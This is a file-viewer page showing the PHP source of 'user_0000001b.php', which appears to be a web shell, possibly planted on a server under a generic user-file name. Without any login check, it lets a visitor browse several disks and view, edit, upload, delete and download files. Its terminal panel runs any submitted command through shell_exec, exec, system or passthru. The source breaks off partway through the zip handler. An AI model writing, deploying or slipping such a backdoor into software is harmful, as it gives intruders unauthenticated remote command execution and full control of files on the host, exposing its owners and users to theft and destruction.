查看文件: user_0000001b.php
大小: 71.22 KB
类型: application/octet-stream
<?php session_start(); // 错误报告设置 - 只显示错误,不显示警告 error_reporting(E_ERROR); ini_set('display_errors', 1); // 定义允许访问的磁盘列表 $allowedDisks = [ 'C:' => 'C盘', 'D:' => 'D盘', 'E:' => 'E盘', // 添加更多磁盘... ]; // 添加网站根目录到允许的路径 $allowedDisks[$_SERVER['DOCUMENT_ROOT']] = '网站根目录'; function aesEncrypt($data, $key) { $method = 'AES-256-CBC'; $ivSize = openssl_cipher_iv_length($method); $iv = openssl_random_pseudo_bytes($ivSize); $encrypted = openssl_encrypt($data, $method, $key, OPENSSL_RAW_DATA, $iv); return base64_encode($iv . $encrypted); } function aesDecrypt($data, $key) { $method = 'AES-256-CBC'; $data = base64_decode($data); $ivSize = openssl_cipher_iv_length($method); $iv = substr($data, 0, $ivSize); $data = substr($data, $ivSize); return openssl_decrypt($data, $method, $key, OPENSSL_RAW_DATA, $iv); } function generateAesKey() { return bin2hex(openssl_random_pseudo_bytes(16)); } // 检查目录权限 function hasDirectoryPermission($path, $mode = 'r') { if (! file_exists($path)) { return false; } clearstatcache(true, $path); if ($mode === 'r') { return is_readable($path); } elseif ($mode === 'w') { return is_writable($path); } return false; } // 安全读取目录内容 function safeScandir($path) { if (! hasDirectoryPermission($path, 'r')) { return []; } $result = @scandir($path); return $result === false ? [] : $result; } // 安全读取文件内容 function safeFileGetContents($path) { if (! hasDirectoryPermission($path, 'r') || ! is_file($path)) { return false; } return @file_get_contents($path); } $encryptionKey = "your-secret-aes-key-32-chars"; // 修复空合并运算符 $a = isset($_GET['a']) && ! empty($_GET['a']) ? $_GET['a'] : 'index'; $b = isset($_GET['b']) && ! empty($_GET['b']) ? $_GET['b'] : 'list'; $c = isset($_GET['c']) && ! empty($_GET['c']) ? $_GET['c'] : 'index'; // 获取初始路径 if (isset($_GET['path']) && ! empty($_GET['path'])) { $encryptedPath = $_GET['path']; $decryptedPath = aesDecrypt($encryptedPath, $encryptionKey); if ($decryptedPath && isValidPath($decryptedPath)) { $path = $decryptedPath; } else { die("非法路径访问!"); } } else { // 默认显示网站根目录 $path = $_SERVER['DOCUMENT_ROOT']; } // 修改路径验证函数以支持多磁盘 function isValidPath($path) { global $allowedDisks; // 检查路径是否在允许的磁盘列表中 $realPath = realpath($path); if ($realPath === false) { return false; } // 检查路径是否在允许的磁盘中 foreach ($allowedDisks as $disk => $name) { $realDisk = realpath($disk); if ($realDisk !== false && strpos($realPath, $realDisk) === 0) { return true; } } return false; } function formatSize($fileSize) { if ($fileSize >= 1073741824) { return round($fileSize / 1073741824, 2) . ' GB'; } elseif ($fileSize >= 1048576) { return round($fileSize / 1048576, 2) . ' MB'; } elseif ($fileSize >= 1024) { return round($fileSize / 1024, 2) . ' KB'; } else { return $fileSize . ' 字节'; } } function getParentDirectory($path) { return dirname($path); } function deleteDirectory($dir) { if (! file_exists($dir)) { return true; } if (! is_dir($dir)) { return unlink($dir); } $items = safeScandir($dir); foreach ($items as $item) { if ($item != '.' && $item != '..') { $path = $dir . DIRECTORY_SEPARATOR . $item; if (is_dir($path)) { deleteDirectory($path); } else { @unlink($path); } } } return @rmdir($dir); } function safeRename($oldPath, $newName, $baseDir = null) { $baseDir = $baseDir !== null ? $baseDir : $_SERVER['DOCUMENT_ROOT']; $oldPath = str_replace(['/', '\\'], DIRECTORY_SEPARATOR, $oldPath); $baseDir = str_replace(['/', '\\'], DIRECTORY_SEPARATOR, $baseDir); $realOldPath = realpath($oldPath); if ($realOldPath === false) { throw new Exception("原路径不存在"); } if (strpos($realOldPath, realpath($baseDir)) !== 0) { throw new Exception("不允许操作该路径"); } if (preg_match('/[\/\\\\:\*\?"<>\|]/', $newName)) { throw new Exception("文件名包含非法字符"); } $dir = dirname($realOldPath); $newPath = $dir . DIRECTORY_SEPARATOR . $newName; if (file_exists($newPath)) { throw new Exception("目标名称已存在"); } if (! @rename($realOldPath, $newPath)) { throw new Exception("重命名操作失败"); } return $newPath; } function addFolderToZip($zip, $folder, $baseName = '') { if (! hasDirectoryPermission($folder, 'r')) { throw new Exception("没有读取目录权限: " . $folder); } $items = safeScandir($folder); foreach ($items as $item) { if ($item != '.' && $item != '..') { $fullPath = $folder . DIRECTORY_SEPARATOR . $item; $localPath = $baseName ? $baseName . '/' . $item : $item; if (is_dir($fullPath)) { $zip->addEmptyDir($localPath); addFolderToZip($zip, $fullPath, $localPath); } else { if (is_readable($fullPath)) { $zip->addFile($fullPath, $localPath); } } } } } function copyDirectory($src, $dst) { if (! hasDirectoryPermission($src, 'r')) { throw new Exception("没有读取源目录权限: " . $src); } if (! hasDirectoryPermission(dirname($dst), 'w')) { throw new Exception("没有写入目标目录权限: " . dirname($dst)); } if (! file_exists($dst)) { if (! @mkdir($dst, 0755, true)) { return false; } } $items = safeScandir($src); foreach ($items as $item) { if ($item != '.' && $item != '..') { $srcFile = $src . DIRECTORY_SEPARATOR . $item; $dstFile = $dst . DIRECTORY_SEPARATOR . $item; if (is_dir($srcFile)) { if (! copyDirectory($srcFile, $dstFile)) { return false; } } else { if (! @copy($srcFile, $dstFile)) { return false; } } } } return true; } function searchFiles($directory, $keyword) { if (! hasDirectoryPermission($directory, 'r')) { return []; // 没有权限,返回空结果 } $results = []; $items = safeScandir($directory); foreach ($items as $item) { if ($item == '.' || $item == '..') { continue; } $path = $directory . DIRECTORY_SEPARATOR . $item; $isDir = is_dir($path); if (stripos($item, $keyword) !== false) { $results[] = [ 'path' => $path, 'size' => filesize($path), 'is_dir' => $isDir, ]; } if ($isDir) { $results = array_merge($results, searchFiles($path, $keyword)); } if (! $isDir && isTextFile($path) && is_readable($path)) { $content = safeFileGetContents($path); if ($content !== false && stripos($content, $keyword) !== false) { $results[] = [ 'path' => $path, 'size' => filesize($path), 'is_dir' => false, ]; } } } return $results; } function getMimeType($filePath) { if (! is_readable($filePath)) { return 'application/octet-stream'; } if (function_exists('finfo_file')) { $finfo = finfo_open(FILEINFO_MIME_TYPE); $mime = finfo_file($finfo, $filePath); finfo_close($finfo); return $mime; } elseif (function_exists('mime_content_type')) { return mime_content_type($filePath); } else { $extension = strtolower(pathinfo($filePath, PATHINFO_EXTENSION)); $mimeMap = [ 'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif', 'bmp' => 'image/bmp', 'webp' => 'image/webp', 'pdf' => 'application/pdf', 'txt' => 'text/plain', 'html' => 'text/html', 'htm' => 'text/html', 'css' => 'text/css', 'js' => 'application/javascript', 'json' => 'application/json', 'xml' => 'application/xml', 'zip' => 'application/zip', 'mp3' => 'audio/mpeg', 'mp4' => 'video/mp4', 'avi' => 'video/x-msvideo', ]; return isset($mimeMap[$extension]) ? $mimeMap[$extension] : 'application/octet-stream'; } } function isImageFile($extension) { $imageExtensions = ['jpg', 'jpeg', 'png', 'gif', 'bmp', 'webp', 'svg']; return in_array(strtolower($extension), $imageExtensions); } function isTextFile($filePath) { $textExtensions = ['txt', 'php', 'html', 'css', 'js', 'json', 'xml', 'md']; $extension = strtolower(pathinfo($filePath, PATHINFO_EXTENSION)); return in_array($extension, $textExtensions); } // 处理POST请求 if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['b'])) { $b = $_POST['b']; } else { $b = isset($_GET['b']) && ! empty($_GET['b']) ? $_GET['b'] : 'list'; } // 修复终端命令处理逻辑 if (isset($_POST['terminal_command'])) { $command = $_POST['terminal_command']; $current_path = isset($_POST['current_path']) ? $_POST['current_path'] : $path; $result = ''; $output = []; $return_var = 0; try { // 检查命令是否为空 if (empty(trim($command))) { throw new Exception("命令不能为空"); } // 切换到指定目录(添加错误检查) if (is_dir($current_path) && is_readable($current_path)) { if (!chdir($current_path)) { throw new Exception("无法切换到目录: " . $current_path); } } // 使用可用的命令执行函数 $executed = false; if (function_exists('shell_exec')) { $output = shell_exec($command . ' 2>&1'); $result = $output !== null ? $output : "命令执行完成,无输出"; $executed = true; } if (!$executed && function_exists('exec')) { exec($command . ' 2>&1', $output, $return_var); $result = implode("\n", $output); if ($return_var !== 0) { $result .= "\n命令退出代码: " . $return_var; } $executed = true; } if (!$executed && function_exists('system')) { ob_start(); system($command . ' 2>&1', $return_var); $result = ob_get_clean(); if ($return_var !== 0) { $result .= "\n命令退出代码: " . $return_var; } $executed = true; } if (!$executed && function_exists('passthru')) { ob_start(); passthru($command . ' 2>&1', $return_var); $result = ob_get_clean(); if ($return_var !== 0) { $result .= "\n命令退出代码: " . $return_var; } $executed = true; } if (!$executed) { throw new Exception("错误: 服务器配置不允许执行系统命令"); } // 获取当前工作目录(可能已被命令改变) $new_path = getcwd(); if ($new_path === false) { $new_path = $current_path; // 如果获取失败,使用原路径 } } catch (Exception $e) { $result = "执行错误: " . $e->getMessage(); $new_path = $current_path; } echo json_encode([ 'output' => $result, 'path' => $new_path, 'error' => isset($e) ? $e->getMessage() : null ]); exit; } // 添加CSS样式 echo '<style> body { font-family: Arial, sans-serif; margin: 20px; } table { border-collapse: collapse; width: 100%; margin-top: 15px; } th, td { border: 1px solid #ddd; padding: 8px; text-align: left; } th { background-color: #f2f2f2; } .error { color: red; padding: 10px; border: 1px solid red; margin: 10px 0; } .success { color: green; padding: 10px; border: 1px solid green; margin: 10px 0; } .btn { padding: 5px 10px; margin: 2px; cursor: pointer; } .permission-denied { color: #888; font-style: italic; } .disk-list { margin-bottom: 20px; padding: 10px; background: #f5f5f5; border-radius: 5px; } .disk-item { display: inline-block; margin-right: 15px; } </style>'; // 主逻辑 switch ($a) { case 'index': switch ($b) { case 'list': // 显示磁盘选择 echo '<div class="disk-list"><strong>磁盘选择:</strong> '; foreach ($allowedDisks as $disk => $name) { $realDisk = realpath($disk); if ($realDisk !== false) { $encryptedDiskPath = aesEncrypt($realDisk, $encryptionKey); echo '<span class="disk-item"><a href="?a=index&b=list&path=' . urlencode($encryptedDiskPath) . '">' . htmlspecialchars($name) . '</a></span>'; } } echo '</div>'; // 检查目录读取权限 if (! hasDirectoryPermission($path, 'r')) { echo '<div class="error">'; echo '错误: 没有读取目录权限: ' . htmlspecialchars($path); echo '</div>'; // 尝试返回上一级 $parentPath = getParentDirectory($path); if (isValidPath($parentPath) && hasDirectoryPermission($parentPath, 'r')) { $encryptedParentPath = aesEncrypt($parentPath, $encryptionKey); echo '<a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '">返回上一级</a>'; } else { // 返回默认目录(网站根目录) $encryptedRoot = aesEncrypt($_SERVER['DOCUMENT_ROOT'], $encryptionKey); echo '<a href="?a=index&b=list&path=' . urlencode($encryptedRoot) . '">返回根目录</a>'; } break; } try { $files = safeScandir($path); if (empty($files)) { throw new Exception("无法读取目录内容或目录为空"); } $parentPath = getParentDirectory($path); $encryptedParentPath = aesEncrypt($parentPath, $encryptionKey); echo '<h2>当前目录: ' . htmlspecialchars($path) . '</h2>'; echo '<a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '">返回上一级</a>'; echo ' <div class="actions"> <button type="button" onclick="showCreateFileForm()" class="btn">新建文件</button> <button type="button" onclick="showCreateFolderForm()" class="btn">新建文件夹</button> <button type="button" onclick="showUploadForm()" class="btn">上传文件</button> <button type="button" onclick="showSearchForm()" class="btn">搜索</button> </div>'; echo ' <div id="createFileForm" style="display:none; margin:10px 0; padding:10px; border:1px solid #ccc;"> <form method="get"> <input type="hidden" name="a" value="index"> <input type="hidden" name="b" value="create_file"> <input type="hidden" name="path" value="' . htmlspecialchars(aesEncrypt($path, $encryptionKey)) . '"> <label>文件名: <input type="text" name="filename" required></label> <button type="submit">创建</button> <button type="button" onclick="hideCreateFileForm()">取消</button> </form> </div>'; echo '<div id="createFolderForm" style="display:none; margin:10px 0; padding:10px; border:1px solid #ccc;"> <form method="get"> <input type="hidden" name="a" value="index"> <input type="hidden" name="b" value="create_folder"> <input type="hidden" name="path" value="' . htmlspecialchars(aesEncrypt($path, $encryptionKey)) . '"> <label>文件夹名: <input type="text" name="foldername" required></label> <button type="submit">创建</button> <button type="button" onclick="hideCreateFolderForm()">取消</button> </form> </div>'; echo '<div id="uploadForm" style="display:none; margin:10px 0; padding:10px; border:1px solid #ccc;"> <form method="post" enctype="multipart/form-data"> <input type="hidden" name="a" value="index"> <input type="hidden" name="b" value="upload"> <input type="hidden" name="path" value="' . htmlspecialchars($path) . '"> <label>选择文件: <input type="file" name="upload_file" required></label> <button type="submit">上传</button> <button type="button" onclick="hideUploadForm()">取消</button> </form> </div>'; echo '<div id="searchForm" style="display:none; margin:10px 0; padding:10px; border:1px solid #ccc;"> <form method="get"> <input type="hidden" name="a" value="index"> <input type="hidden" name="b" value="search"> <input type="hidden" name="path" value="' . htmlspecialchars(aesEncrypt($path, $encryptionKey)) . '"> <label>搜索: <input type="text" name="keyword" required></label> <button type="submit">搜索</button> <button type="button" onclick="hideSearchForm()">取消</button> </form> </div>'; // 终端HTML结构 echo ' <div id="terminal-container" style="display:none; position:fixed; bottom:0; left:0; right:0; background:#000; color:#fff; padding:10px; z-index:1000; height:300px; overflow-y:auto;"> <div style="display:flex; justify-content:space-between; margin-bottom:10px;"> <strong>终端</strong> <button onclick="toggleTerminal()" style="background:#ff4444; color:white; border:none; padding:2px 8px;">关闭</button> </div> <div id="terminal-output" style="font-family:monospace; margin-bottom:10px; white-space:pre-wrap; height:220px; overflow-y:auto;"></div> <div style="display:flex;"> <span style="color:#0f0;" id="terminal-prompt">$ </span> <input type="text" id="terminal-input" style="flex-grow:1; background:#000; color:#0f0; border:none; outline:none; font-family:monospace; margin-left:5px;" autocomplete="off"> </div> </div>'; echo '<button type="button" onclick="toggleTerminal()" class="btn" style="position:fixed; bottom:10px; right:10px; z-index:1001;">打开终端</button>'; echo '<script> function showCreateFileForm() { document.getElementById("createFileForm").style.display = "block"; } function hideCreateFileForm() { document.getElementById("createFileForm").style.display = "none"; } function showCreateFolderForm() { document.getElementById("createFolderForm").style.display = "block"; } function hideCreateFolderForm() { document.getElementById("createFolderForm").style.display = "none"; } function showUploadForm() { document.getElementById("uploadForm").style.display = "block"; } function hideUploadForm() { document.getElementById("uploadForm").style.display = "none"; } function showSearchForm() { document.getElementById("searchForm").style.display = "block"; } function hideSearchForm() { document.getElementById("searchForm").style.display = "none"; } </script>'; // 终端JavaScript代码 echo ' <script> let currentTerminalPath = "' . addslashes($path) . '"; function toggleTerminal() { const terminal = document.getElementById("terminal-container"); if (terminal.style.display === "none") { terminal.style.display = "block"; document.getElementById("terminal-input").focus(); } else { terminal.style.display = "none"; } } function executeCommand(command) { const outputElement = document.getElementById("terminal-output"); const promptElement = document.getElementById("terminal-prompt"); const inputElement = document.getElementById("terminal-input"); // 显示执行的命令(带路径) outputElement.innerHTML += "<span style=\"color:#0ff;\">" + currentTerminalPath + " $ " + command + "</span>\n"; // 禁用输入框防止重复提交 inputElement.disabled = true; // 发送AJAX请求 const xhr = new XMLHttpRequest(); xhr.open("POST", "", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.onreadystatechange = function() { if (xhr.readyState === 4) { // 重新启用输入框 inputElement.disabled = false; inputElement.focus(); if (xhr.status === 200) { try { const response = JSON.parse(xhr.responseText); // 添加输出结果 if (response.output) { outputElement.innerHTML += response.output + "\n"; } // 更新当前路径 if (response.path && response.path !== currentTerminalPath) { currentTerminalPath = response.path; promptElement.textContent = response.path + " $ "; } // 滚动到底部 outputElement.scrollTop = outputElement.scrollHeight; } catch (e) { outputElement.innerHTML += "错误: 无法解析服务器响应\n"; outputElement.scrollTop = outputElement.scrollHeight; } } else { outputElement.innerHTML += "错误: 请求失败 (状态码: " + xhr.status + ")\n"; outputElement.scrollTop = outputElement.scrollHeight; } } }; xhr.onerror = function() { inputElement.disabled = false; inputElement.focus(); outputElement.innerHTML += "错误: 网络请求失败\n"; outputElement.scrollTop = outputElement.scrollHeight; }; xhr.send("terminal_command=" + encodeURIComponent(command) + "¤t_path=" + encodeURIComponent(currentTerminalPath)); } // 终端输入处理 document.getElementById("terminal-input").addEventListener("keydown", function(e) { if (e.key === "Enter") { const command = this.value.trim(); if (command) { executeCommand(command); this.value = ""; } e.preventDefault(); } else if (e.key === "ArrowUp") { // 历史记录功能可以在这里实现 e.preventDefault(); } }); // 初始化终端提示符 document.getElementById("terminal-prompt").textContent = currentTerminalPath + " $ "; </script>'; // 显示剪切/复制状态 if (isset($_SESSION['copy_source']) && file_exists($_SESSION['copy_source'])) { $operationType = isset($_SESSION['operation_type']) ? $_SESSION['operation_type'] : ''; $fileName = basename($_SESSION['copy_source']); $operationText = ($operationType === 'cut') ? '剪切' : '复制'; echo '<div style="background: #ffeaa7; padding: 10px; margin: 10px 0;">'; echo '<strong>待' . $operationText . '的项目:</strong> ' . htmlspecialchars($fileName); echo ' <button type="button" style="margin-left:10px;">'; echo '<a href="?a=index&b=paste&path=' . urlencode(aesEncrypt($path, $encryptionKey)) . '" style="text-decoration:none;color:inherit;">粘贴</a>'; echo '</button>'; echo ' <button type="button" style="margin-left:5px;">'; echo '<a href="?a=index&b=cancel_cut&path=' . urlencode(aesEncrypt($path, $encryptionKey)) . '" style="text-decoration:none;color:inherit;">取消操作</a>'; echo '</button>'; echo '</div>'; } echo '<table>'; echo '<tr><th>文件名</th><th>大小</th><th>类型</th><th>权限</th><th>操作</th></tr>'; foreach ($files as $file) { if ($file == '.' || $file == '..') { continue; } $file = preg_replace('/[\x00-\x1F\x7F]/', '', $file); $filePath = $path . DIRECTORY_SEPARATOR . $file; // 检查文件权限 $isReadable = is_readable($filePath); $isWritable = is_writable($filePath); $fileSize = '无权限访问'; $fileType = '未知'; if ($isReadable) { $fileSize = is_dir($filePath) ? '-' : formatSize(filesize($filePath)); $fileType = is_dir($filePath) ? '文件夹' : '文件'; } // 权限显示 $permissionInfo = ''; $permissionInfo .= $isReadable ? '读 ' : ''; $permissionInfo .= $isWritable ? '写 ' : ''; if (empty($permissionInfo)) { $permissionInfo = '无权限'; } echo '<tr>'; echo '<td>'; if (is_dir($filePath) && $isReadable) { $encryptedPath = aesEncrypt($filePath, $encryptionKey); echo '<a href="?a=index&b=list&path=' . urlencode($encryptedPath) . '">' . htmlspecialchars($file) . '</a>'; } else { echo htmlspecialchars($file); if (! $isReadable) { echo ' <span class="permission-denied">(无权限)</span>'; } } echo '</td>'; echo '<td>' . $fileSize . '</td>'; echo '<td>' . $fileType . '</td>'; echo '<td>' . $permissionInfo . '</td>'; echo '<td>'; if ($isReadable) { echo '<button type="button"><a href="?a=index&b=ck&path=' . urlencode(aesEncrypt($filePath, $encryptionKey)) . '" style="text-decoration:none;color:inherit;">查看</a></button>'; } if ($isWritable) { echo '<button type="button" onclick="if(confirm(\'确定要删除 ' . htmlspecialchars($file) . ' 吗?\')){window.location.href=\'?a=index&b=sc&path=' . urlencode(aesEncrypt($filePath, $encryptionKey)) . '\'}">删除</button>'; echo '<form method="get" style="display:inline;"> <input type="hidden" name="a" value="index"> <input type="hidden" name="b" value="rename_form"> <input type="hidden" name="old_path" value="' . htmlspecialchars(urlencode(aesEncrypt($filePath, $encryptionKey))) . '"> <button type="submit">重命名</button> </form>'; } if ($isReadable && ! is_dir($filePath)) { echo '<button type="button"><a href="?a=index&b=xz&path=' . urlencode(aesEncrypt($filePath, $encryptionKey)) . '" style="text-decoration:none;color:inherit;">下载</a></button>'; echo '<button type="button"><a href="?a=index&b=ys&path=' . urlencode(aesEncrypt($filePath, $encryptionKey)) . '" style="text-decoration:none;color:inherit;">压缩</a></button>'; } if ($isReadable) { echo '<form method="get" style="display:inline;"> <input type="hidden" name="a" value="index"> <input type="hidden" name="b" value="copy"> <input type="hidden" name="source_path" value="' . urlencode(aesEncrypt($filePath, $encryptionKey)) . '"> <button type="submit" onclick="return confirm(\'确定要复制 ' . htmlspecialchars($file) . ' 吗?\')">复制</button> </form>'; echo '<form method="get" style="display:inline;"> <input type="hidden" name="a" value="index"> <input type="hidden" name="b" value="cut"> <input type="hidden" name="source_path" value="' . urlencode(aesEncrypt($filePath, $encryptionKey)) . '"> <button type="submit">剪切</button> </form>'; } echo '</td>'; echo '</tr>'; } echo '</table>'; } catch (Exception $e) { echo '<div class="error">错误: ' . htmlspecialchars($e->getMessage()) . '</div>'; } break; case 'ck': $encryptedPath = $_GET['path']; $path = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($path)) { die("非法路径!"); } if (! is_readable($path)) { echo '<div class="error">错误: 没有读取文件权限</div>'; $parentPath = dirname($path); $encryptedParentPath = aesEncrypt($parentPath, $encryptionKey); echo '<a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '">返回</a>'; break; } $parentPath = dirname($path); $encryptedParentPath = aesEncrypt($parentPath, $encryptionKey); if (is_file($path)) { $fileName = basename($path); $fileSize = formatSize(filesize($path)); $fileMime = getMimeType($path); $fileExtension = strtolower(pathinfo($path, PATHINFO_EXTENSION)); echo '<h2>查看文件: ' . htmlspecialchars($fileName) . '</h2>'; echo '<p>大小: ' . $fileSize . '</p>'; echo '<p>类型: ' . $fileMime . '</p>'; if (isImageFile($fileExtension)) { echo '<div style="margin:20px 0;">'; echo '<img src="?a=index&b=preview_image&path=' . urlencode($encryptedPath) . '" style="max-width:100%; max-height:600px; border:1px solid #ccc;">'; echo '</div>'; } elseif (isTextFile($path)) { $content = safeFileGetContents($path); if ($content === false) { echo '<div class="error">无法读取文件内容</div>'; } else { echo '<form method="post" action="?a=index&b=save_edit">'; echo '<input type="hidden" name="path" value="' . htmlspecialchars($encryptedPath) . '">'; echo '<textarea name="content" style="width:100%; height:400px; font-family:monospace; padding:10px;">' . htmlspecialchars($content) . '</textarea>'; echo '<div style="margin:10px 0;">'; echo '<button type="submit" style="text-decoration:none;color:inherit;">保存</button>'; echo '<button type="button"><a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '" style="text-decoration:none;color:inherit;">取消</a></button>'; echo '</div>'; echo '</form>'; } } } else { echo '<p>这不是一个文件</p>'; } echo '<div style="margin-top:20px;">'; echo '<button type="button"><a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '" style="text-decoration:none;color:inherit;">返回文件列表</a></button>'; echo '</div>'; break; case 'save_edit': try { if ($_SERVER['REQUEST_METHOD'] !== 'POST') { throw new Exception("无效的请求方法"); } $encryptedPath = isset($_POST['path']) ? $_POST['path'] : ''; $content = isset($_POST['content']) ? $_POST['content'] : ''; if (empty($encryptedPath)) { throw new Exception("缺少文件路径"); } $path = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($path)) { throw new Exception("非法路径"); } // 权限检查 if (! is_writable($path)) { throw new Exception("文件不可写"); } if (! is_file($path)) { throw new Exception("不是文件"); } if (file_put_contents($path, $content) === false) { throw new Exception("保存失败"); } $parentDir = dirname($path); $encryptedParentPath = aesEncrypt($parentDir, $encryptionKey); echo '<div class="success">文件保存成功!</div>'; echo '<button type="button"><a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '" style="text-decoration:none;color:inherit;">返回文件列表</a></button>'; echo '<button type="button"><a href="?a=index&b=ck&path=' . urlencode($encryptedPath) . '" style="text-decoration:none;color:inherit;">继续编辑</a></button>'; } catch (Exception $e) { echo '<div class="error">保存失败: ' . htmlspecialchars($e->getMessage()) . '</div>'; if (isset($encryptedParentPath)) { echo '<a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '">返回</a>'; } } break; case 'preview_image': try { $encryptedPath = $_GET['path']; $path = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($path) || ! is_file($path)) { header('HTTP/1.0 404 Not Found'); exit; } // 权限检查 if (! is_readable($path)) { header('HTTP/1.0 403 Forbidden'); exit; } $mime = getMimeType($path); header('Content-Type: ' . (! empty($mime) ? $mime : 'application/octet-stream')); header('Content-Length: ' . filesize($path)); readfile($path); exit; } catch (Exception $e) { header('HTTP/1.0 500 Internal Server Error'); exit; } break; case 'epreview_imag': $encryptedPath = $_GET['path']; $path = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($path) || ! is_file($path)) { header('HTTP/1.0 404 Not Found'); exit; } $mime = getMimeType($path); header('Content-Type: ' . (! empty($mime) ? $mime : 'application/octet-stream')); header('Content-Length: ' . filesize($path)); readfile($path); exit; break; case 'save_edit': try { if ($_SERVER['REQUEST_METHOD'] !== 'POST') { throw new Exception("无效的请求方法"); } $encryptedPath = isset($_POST['path']) ? $_POST['path'] : ''; $content = isset($_POST['content']) ? $_POST['content'] : ''; if (empty($encryptedPath)) { throw new Exception("缺少文件路径"); } $path = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($path)) { throw new Exception("非法路径"); } // 权限检查 if (! is_writable($path)) { throw new Exception("文件不可写"); } if (! is_file($path)) { throw new Exception("不是文件"); } if (file_put_contents($path, $content) === false) { throw new Exception("保存失败"); } $parentDir = dirname($path); $encryptedParentPath = aesEncrypt($parentDir, $encryptionKey); echo '<div class="success">文件保存成功!</div>'; echo '<button type="button"><a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '" style="text-decoration:none;color:inherit;">返回文件列表</a></button>'; echo '<button type="button"><a href="?a=index&b=ck&path=' . urlencode($encryptedPath) . '" style="text-decoration:none;color:inherit;">继续编辑</a></button>'; } catch (Exception $e) { echo '<div class="error">保存失败: ' . htmlspecialchars($e->getMessage()) . '</div>'; if (isset($encryptedParentPath)) { echo '<a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '">返回</a>'; } } break; case 'sc': try { $encryptedPath = $_GET['path']; $path = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($path)) { throw new Exception("非法路径!"); } // 权限检查 if (! is_writable(dirname($path))) { throw new Exception("没有删除权限"); } $parentPath = dirname($path); $encryptedParentPath = aesEncrypt($parentPath, $encryptionKey); $protected = [realpath('/'), realpath($_SERVER['DOCUMENT_ROOT'])]; if (in_array(realpath($path), $protected)) { throw new Exception("不能删除系统重要目录!"); } if (! file_exists($path)) { throw new Exception("文件或目录不存在!"); } $msg = ""; if (is_dir($path)) { if (deleteDirectory($path)) { $msg = "目录删除成功!"; } else { throw new Exception("目录删除失败!"); } } else { if (unlink($path)) { $msg = "文件删除成功!"; } else { throw new Exception("文件删除失败!"); } } echo '<div class="success">' . $msg . '</div>'; echo '<a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '">返回</a>'; } catch (Exception $e) { echo '<div class="error">删除出错:' . htmlspecialchars($e->getMessage()) . '</div>'; if (isset($encryptedParentPath)) { echo '<a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '">返回</a>'; } } break; case 'rename_form': $encryptedPath = urldecode($_GET['old_path']); $path = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($path)) { die("非法路径!"); } $fileName = basename($path); $parentDir = dirname($path); $encryptedParentPath = aesEncrypt($parentDir, $encryptionKey); echo '<div style="margin:20px;"> <h3>重命名文件/目录</h3> <form method="get"> <input type="hidden" name="a" value="index"> <input type="hidden" name="b" value="rename"> <input type="hidden" name="old_path" value="' . htmlspecialchars($encryptedPath) . '"> <p>原名称: ' . htmlspecialchars($fileName) . '</p> <p>新名称: <input type="text" name="new_name" value="' . htmlspecialchars($fileName) . '"></p> <button type="submit">确认重命名</button> <a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '">取消</a> </form> </div>'; break; case 'rename': try { $encryptedPath = isset($_GET['old_path']) ? $_GET['old_path'] : ''; if (empty($encryptedPath)) { throw new Exception("缺少原路径参数"); } $newName = trim(isset($_GET['new_name']) ? $_GET['new_name'] : ''); if (empty($newName)) { throw new Exception("新名称不能为空"); } $oldPath = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($oldPath)) { throw new Exception("非法路径!"); } $parentDir = dirname($oldPath); $encryptedParentPath = aesEncrypt($parentDir, $encryptionKey); $newPath = safeRename($oldPath, $newName); header('Location: ?a=index&b=list&path=' . urlencode($encryptedParentPath)); exit; } catch (Exception $e) { echo '<div style="color:red;">重命名失败: ' . htmlspecialchars($e->getMessage()) . '</div>'; echo '<a href="?a=index&b=list&path=' . urlencode(isset($encryptedParentPath) ? $encryptedParentPath : $path) . '">返回</a>'; } break; case 'xz': try { $encryptedPath = $_GET['path']; $path = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($path)) { throw new Exception("非法路径!"); } // 权限检查 if (! is_readable($path)) { throw new Exception("没有读取文件权限"); } if (! is_file($path)) { throw new Exception("路径不是文件"); } $parentPath = dirname($path); $encryptedParentPath = aesEncrypt($parentPath, $encryptionKey); $file = preg_replace('/[\x00-\x1F\x7F]/', '', $path); $realFile = realpath($file); if (! $realFile) { throw new Exception("文件路径解析失败: $file"); } if (! file_exists($realFile)) { throw new Exception("文件不存在: $realFile"); } $baseDir = realpath($_SERVER['DOCUMENT_ROOT']); if (strpos($realFile, $baseDir) !== 0) { throw new Exception("不允许访问该路径的文件"); } // 设置下载头 header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); header('Content-Length: ' . filesize($realFile)); ob_clean(); flush(); readfile($realFile); exit; } catch (Exception $e) { echo '<div class="error">下载失败: ' . htmlspecialchars($e->getMessage()) . '</div>'; if (isset($encryptedParentPath)) { echo '<a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '">返回</a>'; } } break; case 'ys': try { $encryptedPath = $_GET['path']; $path = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($path)) { throw new Exception("非法路径!"); } // 权限检查 if (! is_readable($path)) { throw new Exception("没有读取权限"); } if (! is_writable(dirname($path))) { throw new Exception("没有写入权限"); } $parentPath = dirname($path); $encryptedParentPath = aesEncrypt($parentPath, $encryptionKey); if (! file_exists($path)) { throw new Exception("文件不存在!"); } $zipPath = $path . 